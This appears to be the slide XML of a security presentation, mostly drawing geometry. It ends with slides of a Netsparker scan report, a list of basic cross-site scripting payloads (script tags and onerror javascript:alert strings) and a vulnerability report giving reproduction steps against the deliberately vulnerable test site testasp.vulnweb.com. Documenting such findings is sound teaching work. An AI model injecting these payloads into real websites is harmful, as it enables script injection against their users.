              <a:gd name="connsiteY4" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 463 w 4106520"/>
              <a:gd name="connsiteY5" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 25706 w 4106520"/>
              <a:gd name="connsiteY6" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 46561 w 4106520"/>
              <a:gd name="connsiteY7" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 4068803 w 4106520"/>
              <a:gd name="connsiteY8" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 4102330 w 4106520"/>
              <a:gd name="connsiteY9" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 4102329 w 4106520"/>
              <a:gd name="connsiteY10" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 4068802 w 4106520"/>
              <a:gd name="connsiteY11" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY12" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY13" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 46547 w 4106520"/>
              <a:gd name="connsiteY14" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY15" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY16" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX17" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY17" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY0" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY1" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 6337 w 4106520"/>
              <a:gd name="connsiteY2" fmla="*/ 7269284 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY3" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 463 w 4106520"/>
              <a:gd name="connsiteY4" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 25706 w 4106520"/>
              <a:gd name="connsiteY5" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 46561 w 4106520"/>
              <a:gd name="connsiteY6" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 4068803 w 4106520"/>
              <a:gd name="connsiteY7" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 4102330 w 4106520"/>
              <a:gd name="connsiteY8" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 4102329 w 4106520"/>
              <a:gd name="connsiteY9" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 4068802 w 4106520"/>
              <a:gd name="connsiteY10" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY11" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY12" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 46547 w 4106520"/>
              <a:gd name="connsiteY13" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY14" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY15" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX16" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY16" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY0" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY1" fmla="*/ 7295316 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY2" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 463 w 4106520"/>
              <a:gd name="connsiteY3" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 25706 w 4106520"/>
              <a:gd name="connsiteY4" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 46561 w 4106520"/>
              <a:gd name="connsiteY5" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 4068803 w 4106520"/>
              <a:gd name="connsiteY6" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 4102330 w 4106520"/>
              <a:gd name="connsiteY7" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 4102329 w 4106520"/>
              <a:gd name="connsiteY8" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 4068802 w 4106520"/>
              <a:gd name="connsiteY9" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY10" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY11" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 46547 w 4106520"/>
              <a:gd name="connsiteY12" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY13" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY14" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX15" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY15" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY0" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY1" fmla="*/ 7082840 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 463 w 4106520"/>
              <a:gd name="connsiteY2" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 25706 w 4106520"/>
              <a:gd name="connsiteY3" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 46561 w 4106520"/>
              <a:gd name="connsiteY4" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 4068803 w 4106520"/>
              <a:gd name="connsiteY5" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 4102330 w 4106520"/>
              <a:gd name="connsiteY6" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 4102329 w 4106520"/>
              <a:gd name="connsiteY7" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 4068802 w 4106520"/>
              <a:gd name="connsiteY8" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY9" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 4051295 w 4106520"/>
              <a:gd name="connsiteY10" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 46547 w 4106520"/>
              <a:gd name="connsiteY11" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY12" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY13" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX14" fmla="*/ 9074 w 4106520"/>
              <a:gd name="connsiteY14" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 9096 w 4106542"/>
              <a:gd name="connsiteY0" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 485 w 4106542"/>
              <a:gd name="connsiteY1" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 25728 w 4106542"/>
              <a:gd name="connsiteY2" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 46583 w 4106542"/>
              <a:gd name="connsiteY3" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 4068825 w 4106542"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 4102352 w 4106542"/>
              <a:gd name="connsiteY5" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 4102351 w 4106542"/>
              <a:gd name="connsiteY6" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 4068824 w 4106542"/>
              <a:gd name="connsiteY7" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 4051317 w 4106542"/>
              <a:gd name="connsiteY8" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 4051317 w 4106542"/>
              <a:gd name="connsiteY9" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 46569 w 4106542"/>
              <a:gd name="connsiteY10" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 9096 w 4106542"/>
              <a:gd name="connsiteY11" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 9096 w 4106542"/>
              <a:gd name="connsiteY12" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX13" fmla="*/ 9096 w 4106542"/>
              <a:gd name="connsiteY13" fmla="*/ 8117697 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 8611 w 4106057"/>
              <a:gd name="connsiteY0" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 4106057"/>
              <a:gd name="connsiteY1" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 25243 w 4106057"/>
              <a:gd name="connsiteY2" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 46098 w 4106057"/>
              <a:gd name="connsiteY3" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 4068340 w 4106057"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 4101867 w 4106057"/>
              <a:gd name="connsiteY5" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 4101866 w 4106057"/>
              <a:gd name="connsiteY6" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 4068339 w 4106057"/>
              <a:gd name="connsiteY7" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 4050832 w 4106057"/>
              <a:gd name="connsiteY8" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 4050832 w 4106057"/>
              <a:gd name="connsiteY9" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 46084 w 4106057"/>
              <a:gd name="connsiteY10" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 8611 w 4106057"/>
              <a:gd name="connsiteY11" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX12" fmla="*/ 8611 w 4106057"/>
              <a:gd name="connsiteY12" fmla="*/ 8213677 h 10695515"/>
              <a:gd name="connsiteX0" fmla="*/ 8611 w 4106057"/>
              <a:gd name="connsiteY0" fmla="*/ 10659953 h 10695515"/>
              <a:gd name="connsiteX1" fmla="*/ 0 w 4106057"/>
              <a:gd name="connsiteY1" fmla="*/ 40543 h 10695515"/>
              <a:gd name="connsiteX2" fmla="*/ 25243 w 4106057"/>
              <a:gd name="connsiteY2" fmla="*/ 4670 h 10695515"/>
              <a:gd name="connsiteX3" fmla="*/ 46098 w 4106057"/>
              <a:gd name="connsiteY3" fmla="*/ 37 h 10695515"/>
              <a:gd name="connsiteX4" fmla="*/ 4068340 w 4106057"/>
              <a:gd name="connsiteY4" fmla="*/ 0 h 10695515"/>
              <a:gd name="connsiteX5" fmla="*/ 4101867 w 4106057"/>
              <a:gd name="connsiteY5" fmla="*/ 33528 h 10695515"/>
              <a:gd name="connsiteX6" fmla="*/ 4101866 w 4106057"/>
              <a:gd name="connsiteY6" fmla="*/ 10662081 h 10695515"/>
              <a:gd name="connsiteX7" fmla="*/ 4068339 w 4106057"/>
              <a:gd name="connsiteY7" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX8" fmla="*/ 4050832 w 4106057"/>
              <a:gd name="connsiteY8" fmla="*/ 10695514 h 10695515"/>
              <a:gd name="connsiteX9" fmla="*/ 4050832 w 4106057"/>
              <a:gd name="connsiteY9" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX10" fmla="*/ 46084 w 4106057"/>
              <a:gd name="connsiteY10" fmla="*/ 10695515 h 10695515"/>
              <a:gd name="connsiteX11" fmla="*/ 8611 w 4106057"/>
              <a:gd name="connsiteY11" fmla="*/ 10659953 h 10695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06057" h="10695515">
                <a:moveTo>
                  <a:pt x="8611" y="10659953"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="5741" y="7120150"/>
                  <a:pt x="2870" y="3580346"/>
                  <a:pt x="0" y="40543"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="8414" y="19945"/>
                  <a:pt x="10728" y="16628"/>
                  <a:pt x="25243" y="4670"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="46098" y="37"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4068340" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="4086837" y="52"/>
                  <a:pt x="4101820" y="15032"/>
                  <a:pt x="4101867" y="33528"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4107455" y="1810541"/>
                  <a:pt x="4107454" y="8885083"/>
                  <a:pt x="4101866" y="10662081"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4101761" y="10680541"/>
                  <a:pt x="4086798" y="10695466"/>
                  <a:pt x="4068339" y="10695514"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="4050832" y="10695514"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4050832" y="10695515"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="46084" y="10695515"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="25394" y="10695403"/>
                  <a:pt x="8665" y="10679532"/>
                  <a:pt x="8611" y="10659953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Picture 4" descr="Graphical user interface, text, application, Word, email&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A009BA6E-80F5-47AC-819A-FB1E4728B4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02981" y="651681"/>
            <a:ext cx="9786038" cy="50153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CC57C7-DF46-4B49-9BE5-DF879BEAD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1527" y="4681971"/>
            <a:ext cx="8448517" cy="13496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dirty="0"/>
              <a:t>NETSPARKER REPORT (2):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82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660AA-E184-4091-BF33-51FADDFEF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PAYLOADS FOR XSS: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4D575-7165-4F7B-8470-88424D432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img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>onerroe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(1)"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;script&gt;alert(1)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;audio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(1)"&gt;&lt;/audio&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;video </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(1)"&gt;&lt;/video&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;image </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(1)"&gt;&lt;/image&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(1)"&gt;&lt;/script&gt;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857042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0B509-8FDD-4217-ACDE-E4D129C43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570" y="-480382"/>
            <a:ext cx="9493249" cy="1577975"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>VULNERABILITY REPORT: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6085D-AEB6-4C01-BA85-707AB8DD3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6569" y="1514279"/>
            <a:ext cx="9493250" cy="400656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/>
              <a:t>TITLE              : CROSS SITE SCRIPTING</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>DOMAIN             : Vulnweb.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SUBDOMAIN          : testasp.vulnweb.com</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SEVERITY           : CRITICAL </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PARAMETER TYPE     : GET</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>STEPS TO REPRODUCE : 1.visit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://testasp.vulnweb.com/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                     2. On the top menu you will find a search option.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                     3. Click on it and you will prompted into the vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                        Parameter.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                     4. Inject this </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> codes properly into the vulnerable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>                        Parameter.</a:t>
            </a:r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75072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E896C-7463-4B8E-9898-6B4FC8D34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323" y="501758"/>
            <a:ext cx="9493250" cy="6000293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 dirty="0"/>
              <a:t>                :</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>img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src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>onerroe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(1)"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>                :&lt;script&gt;alert(1)&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>                :&lt;audio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>href</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>=1 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>onerror</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>javascript:alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>(1)"&gt;&lt;/audio&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>                :&lt;video </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
